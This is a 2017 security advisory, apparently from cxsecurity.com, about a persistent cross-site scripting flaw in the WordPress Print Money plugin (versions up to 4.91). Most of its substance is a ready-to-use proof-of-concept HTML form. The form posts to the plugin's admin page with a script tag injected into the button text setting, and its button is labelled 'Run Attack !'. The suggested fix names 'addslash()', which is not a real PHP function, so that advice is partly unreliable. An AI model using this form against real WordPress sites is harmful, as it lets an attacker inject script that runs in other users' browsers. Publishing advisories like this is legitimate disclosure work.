WordPress Print Money v4.91 Plugin Persistent Cross Site Scripting

Published
Credit
Risk
2017.03.14
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

-----------------------------------------
- Credit : Ashiyane Digital Security Team
- Website : Www.Ashiyane.Org
- Discovered By : ZeroDay
- Release Date : March 13 , 2017
- Level : Low
-----------------------------------------
I.Vulnerability
---------------
WordPress Print Money v4.91 Plugin Persistent Cross Site Scripting

II.BackGround
-------------
Print Money is a WordPress Plugin That Make a Button To Any WordPress Image To Enable Your Visitors To Buy Prints

III.DESCRIPTION
----------------
Has been Detected a Persistent XSS Vulnerability In Print Money, That Allows
The Execution Of Arbitrary HTML/script Code To Be Executed In The Context
Of The Victim User's Browser.

IV.PROOF OF CONCEPT EXPLOIT
---------------------------
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=print-money" method="POST">
<input type="hidden" name="button_text" value=""><script>alert("XSS By ZeroDay");</script>" />
<input type="hidden" name="img-print-btn-cats-update" value="Update" />
<input type="hidden" name="button_text_color" value="%23fff" />
<input type="hidden" name="button_bg_color" value="%%23000" />
<input type="hidden" name="position" value="top-left" />
<input type="hidden" name="container" value="entry-content%2Celements-box%2Cthn_post_wrap%2Clist-inline%2Cblog%2Cpost%2Cpost-content%2Centry%2Centry-summary%2Cgroup%2Ccontent%2Ccontent_constrain%2Cpage-content%2Cpage-content%2Crow%2Ctp-single-post%2Cbody%2Cthe-content%2Cwrapper%2Chentry" />
<input type="hidden" name="updateSubmit" value="Update" />
<input type="submit" value="Run Attack !" />
</form>
</body>
</html>

V.SYSTEM AFFECTED
-----------------
Print Money <= 4.91

VI.SOLUTION
-----------
You Can Use Filter function Like As htmlspecialchars() , addslash() , htmlentities() To Patch This
Vulnerability

VII. REFERENCES
-------------------------
https://wordpress.org/plugins/print-money/

VIII. CREDITS
-------------------------
This Vulnerability Has Been Discovered By ZeroDay

IX. ABOUT
-------------------------
ZeroDay
Researcher , Pentester

References:

https://wordpress.org/plugins/print-money/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com